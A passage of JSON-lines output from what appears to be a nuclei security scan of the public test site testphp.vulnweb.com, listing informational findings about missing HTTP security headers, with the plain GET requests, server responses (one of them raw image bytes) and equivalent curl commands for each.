PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:06.620924465Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Network Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:07.249925479Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:07.249955258Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"path\":\"/Mod_Rewrite_Shop/Details/color-printer/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3\",\"request\":\"GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:07.249970335Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"path\":\"/pictures/4.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/4.jpg.tn\",\"request\":\"GET /pictures/4.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4615\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:58 GMT\\r\\nEtag: \\\"4dca64a1-1207\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0005\\u0000\\u0003\\u0006\\u0002\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u00005\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0005\\u0002\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004\\u0000\\u0012!\\u00051A\\u0013Q\\u0006\\\"aq\\ufffd\\u0014\\ufffd#2B\\ufffd\\ufffdR\\ufffd\\ufffd%3\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u0000\\u001a\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0003\\u0000\\u0002\\u0005\\u0004\\u0006\\ufffd\\ufffd\\u00000\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0001\\u0006\\u0005\\u0003\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0011\\u0012!1A\\u0004\\u0013\\\"2Qq\\u0005a\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd\\u0014#Rb\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000K4\\ufffd5\\ufffd\\ufffd\\ufffd\\u001d\\ufffdÔ\\u0012I\\ufffd?\\ufffd#Y6\\ufffd\\ufffd^\\ufffds`\\u001f\\ufffd\\ufffd# 2\\ufffd#Ag\\ufffd\\ufffd\\u0026V\\u0016\\u000f\\ufffd\\ufffd\\ufffd\\u0000:\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd02t\\ufffd\\ufffd\\u003e\\u001cnX3P\\ufffdW\\ufffd\\ufffd\\u0000s\\ufffd\\ufffdD\\ufffd-\\ufffd\\ufffd\\ufffd#\\ufffd\\u00268\\ufffd3\\ufffd\\ufffd\\ufffdq\\ufffd\\u0011\\ufffdA\\ufffd4\\t\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd0+\\ufffd\\ufffd\\ufffdF\\ufffd!\\ufffd4\\ufffd\\\"\\ufffd\\ufffd#\\ufffd)c\\ufffd\\u0002\\ufffd\\u001b\\ufffdzTZ\\ufffd\\u0000\\ufffdWo\\u0015\\ufffd\\u003cs\\r\\ufffd\\ufffd\\u00159D\\ufffd\\ufffd\\u0026\\ufffd\\tRտ\\ufffd\\ufffd\\u000b\\ufffdkZ$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\u003e\\ufffd{\\ufffdrB\\ufffd2\\ufffd]\\ufffdU]\\ufffdwy \\u001f\\u001d\\ufffd\\ufffd\\ufffd\\u0010~\\ufffd\\r\\u0006\\ufffdK\\ufffd\\ufffdۊ\\ufffdk\\ufffd~\\ufffd\\ufffd\\u0000\\ufffd\\ufffd8\\u000f\\ufffd\\ufffd~fI\\t\\u001b\\ufffd\\u0015D\\u001e\\ufffd\\ufffd\\u0000\\ufffd\\u001d\\u003c\\ufffd+\\u0014(\\ufffd\\u0000\\u0000v\\u0002\\ufffdj\\u0003\\ufffd?(Xi\\ufffd|\\ufffd\\ufffdRZ\\u001e\\ufffdC\\ufffd\\ufffdo\\ufffd.\\u001e)w ! 3n\\u000b\\ufffd\\u0013E\\ufffd\\ufffd\\ufffdagU˔#BX\\ufffd\\u0002\\ufffd\\ufffd\\ufffd\\ufffd=M\\ufffd\\ufffd\\ufffd\\u001a\\ufffd}\\ufffd\\u0006\\ufffd\\u0002\\ufffd=\\ufffd\\u0000\\ufffd\\u001c\\ufffd\\ufffdca̭I\\ufffd\\ufffd\\ufffd!\\ufffd\\u0003\\u0000\\ufffdN\\ufffdY\\ufffd\\u0019\\ufffd0UdK\\ufffd\\ufffd\\u0008'\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffd\\u0000\\ufffdm\\ufffd\\ufffd^\\u003e\\ufffdQ\\ufffd\\ufffd\\u0012*\\ufffd\\ufffdQ\\ufffd\\u000f\\u001ac\\u001c\\ufffd\\u0005\\ufffdF\\ufffd\\ufffd\\ufffd*\\ufffd\\\\\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdՆP\\u0007\\u003c~t\\ufffd\\ufffdU\\u0014\\ufffd2\\ufffd\\u003c\\ufffdgz\\ufffd\\ufffd\\u000f$Y\\ufffd\\ufffd\\ufffde\\ufffd\\u0000\\u0006\\ufffd?3\\u0003\\ufffd\\n\\u003cv\\ufffd\\ufffd\\ufffdX\\u000e`U,p\\u0026\\ufffd7\\ufffdC\\u0017\\ufffdcW\\u0006hP3/\\ufffd\\ufffd[=\\ufffd?\\ufffdf\\u001aL\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdʑ\\ufffd\\ufffdr\\ufffd,\\ufffd\\u0015\\ufffd*\\ufffd\\u0008.\\ufffd\\\"\\ufffd$\\ufffd\\u0016{\\ufffd\\u0018=\\\"l\\ufffd\\ufffd\\ufffd\\ufffdv\\ufffd\\ufffdl\\ufffd\\u003c\\ufffdU#\\ufffd\\ufffdI\\ufffdr\\u0000\\ufffdx\\ufffd\\ufffdֶ\\ufffd/\\ufffdA\\ufffd\\u0015\\ufffdC\\ufffd BĒhj\\ufffd-\\ufffdg\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffdГ4\\ufffd\\ufffd\\ufffdCL\\ufffd\\u0018\\u0008\\ufffd\\ufffd(\\ufffdh\\ufffd\\u000by\\u001c\\ufffdB\\ufffd\\u0017\\ufffdf\\u0026\\u003cpƱ\\ufffd\\u001a\\ufffd(\\ufffd\\ufffd(\\u0001\\ufffd5\\\\*\\u0005\\n\\ufffdq\\ufffd:\\ufffd\\ufffd\\u001bE\\u0016\\u0026\\\\\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\u0013\\ufffdutg\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\u0019?\\ufffd\\ufffd\\t\\u0014\\ufffd\\ufffd@\\ufffd\\u001e,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd鼓n]/\\ufffd\\ufffd\\ufffdU܄\\ufffd\\ufffd\\ufffdZ\\u0007\\ufffd\\ufffd:[\\ufffdԃdK\\u0004\\ufffd\\ufffde'bHl\\ufffd\\ufffd\\ufffds]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\u000e\\ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\